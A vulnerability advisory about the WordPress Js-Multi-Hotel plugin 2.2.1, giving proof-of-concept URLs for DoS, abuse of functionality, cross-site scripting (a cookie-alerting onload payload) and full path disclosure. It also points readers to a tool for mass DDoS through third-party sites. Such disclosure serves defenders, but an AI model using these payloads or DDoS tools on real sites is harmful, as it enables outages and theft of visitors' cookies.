WordPress Js-Multi-Hotel 2.2.1 XSS/DoS Vulnerability

Hello list! There are multiple vulnerabilities in Js-Multi-Hotel plugin for WordPress.Earlier I wrote about two other vulnerabilities. These are Abuse of Functionality, Denial of Service, Cross-Site Scriptingand Full path disclosure vulnerabilities in Js-Multi-Hotel plugin forWordPress. There are much more vulnerabilities in this plugin (includingdangerous holes), so after two advisories I''ll write new advisories. -------------------------Affected products:------------------------- Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions. -------------------------Affected vendors:------------------------- Joomlaskinhttp://www.joomlaskin.it -------------------------Affected products:------------------------- Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions. ----------Details:---------- Abuse of Functionality (WASC-42): http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site&w=1&h=1 DoS (WASC-10): http://site/wp-content/plugins/js-multihotel/includes/show_image.php?file=http://site/big_file&h=1&w=1 Besides conducting DoS attack manually, it''s also possible to conductautomated DoS and DDoS attacks with using of DAVOSET(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html). DDoS attacks via other sites execution tool:http://websecurity.com.ua/davoset/ Video demonstration of DAVOSET: http://www.youtube.com/watch?v=RKi35-f346I Cross-Site Scripting (WASC-08): http://www.sitedirsec.com/wp-content/plugins/js-multihotel/includes/delete_img.php?path=%3Cbody%20onload=with(document)alert(cookie)%3E About XSS vulnerability in refreshDate.php in parameter roomid there waswritten earlier(http://packetstormsecurity.com/files/124239/WordPress-Js-Multi-Hotel-2.2.1-Cross-Site-Scripting.html). Full path disclosure (WASC-13): http://site/wp-content/plugins/js-multihotel/includes/functions.php http://site/wp-content/plugins/js-multihotel/includes/myCalendar.php http://site/wp-content/plugins/js-multihotel/includes/refreshDate.php?d= http://site/wp-content/plugins/js-multihotel/includes/show_image.php http://site/wp-content/plugins/js-multihotel/includes/widget.php http://site/wp-content/plugins/js-multihotel/includes/phpthumb/GdThumb.inc.php http://site/wp-content/plugins/js-multihotel/includes/phpthumb/thumb_plugins/gd_reflection.inc.php I wrote about these vulnerabilities at my site(http://websecurity.com.ua/7087/). Best wishes & regards,MustLiveAdministrator of Websecurity web sitehttp://websecurity.com.ua